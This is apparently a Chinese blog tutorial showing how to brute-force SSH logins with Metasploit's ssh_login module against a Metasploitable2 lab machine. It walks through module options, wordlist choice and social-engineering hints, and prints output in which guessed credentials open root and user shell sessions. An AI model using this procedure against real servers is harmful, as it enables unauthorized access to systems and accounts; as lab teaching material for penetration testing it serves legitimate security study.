Metasploit通过ssh暴力破解

Metasploit通过ssh暴力破解

查询ssh_login模块 search ssh_login

复制代码
msf5 auxiliary(sniffer/psnuffle) > search ssh_login

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


Interact with a module by name or index, for example use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey

run

使用auxiliary/scanner/ssh/ssh_login模块, 设置相关参数

复制代码
msf5 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting     Required  Description
   ----              ---------------     --------  -----------
   BLANK_PASSWORDS   false               no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                   yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false               no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false               no        Add all passwords in the current database to the list
   DB_ALL_USERS      false               no        Add all users in the current database to the list
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS            192.168.80.201      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22                  yes       The target port
   STOP_ON_SUCCESS   false               yes       Stop guessing when a credential works for a host
   THREADS           25                  yes       The number of concurrent threads (max one per host)
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE     /root_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false               no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   VERBOSE           true                yes       Whether to print output for all attempts

这里使用msf自带的字典对metaspliotable2, root用户进行爆破。

/usr/share/metasploit-framework/data/wordlists, 使用root_userpass.txt(文件内)

由于知道root用户密码, 最字典最后添加一行即可。具体字典根据实际情况使用可结合社会工程学。

复制代码
[-] 192.168.80.201:22 - Failed: 'root:ibm'
[-] 192.168.80.201:22 - Failed: 'root:monitor'
[-] 192.168.80.201:22 - Failed: 'root:turnkey'
[-] 192.168.80.201:22 - Failed: 'root:vagrant'
[+] 192.168.80.201:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.80.200:43555 -> 192.168.80.201:22) at 2020-09-09 02:32:13 -0400
[+] 192.168.80.201:22 - Success: 'root:123.com' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (192.168.80.200:38359 -> 192.168.80.201:22) at 2020-09-09 02:32:14 -0400

这里发现msfadmin和root都连接成功。通过sessions -i连接ttl

相关推荐
戒不掉的伤怀26 分钟前
【Navicat 连接MySQL时出现错误1251:客户端不支持服务器请求的身份验证协议;请考虑升级MySQL客户端】
服务器·数据库·mysql
超喜欢下雨天26 分钟前
服务器安装 ros2时遇到底层库依赖冲突的问题
linux·运维·服务器·ros2
cv高级工程师YKY31 分钟前
服务器 - - QPS与TPS介绍
数据库
搬码临时工32 分钟前
小企业如何搭建本地私有云服务器,并设置内部网络地址提供互联网访问
运维·服务器
nbsaas-boot39 分钟前
高可扩展属性建模设计:架构师的全局思考与落地方案
数据库
爱上语文1 小时前
Redis基础(5):Redis的Java客户端
java·开发语言·数据库·redis·后端
18你磊哥1 小时前
Windows 本地安装部署 Apache Druid
运维·debian
陈敬雷-充电了么-CEO兼CTO2 小时前
推荐算法系统系列>推荐数据仓库集市的ETL数据处理
大数据·数据库·数据仓库·数据挖掘·数据分析·etl·推荐算法
MeshddY2 小时前
(超详细)数据库项目初体验:使用C语言连接数据库完成短地址服务(本地运行版)
c语言·数据库·单片机
wuxinyan1232 小时前
Java面试题033:一文深入了解MySQL(5)
java·数据库·mysql·面试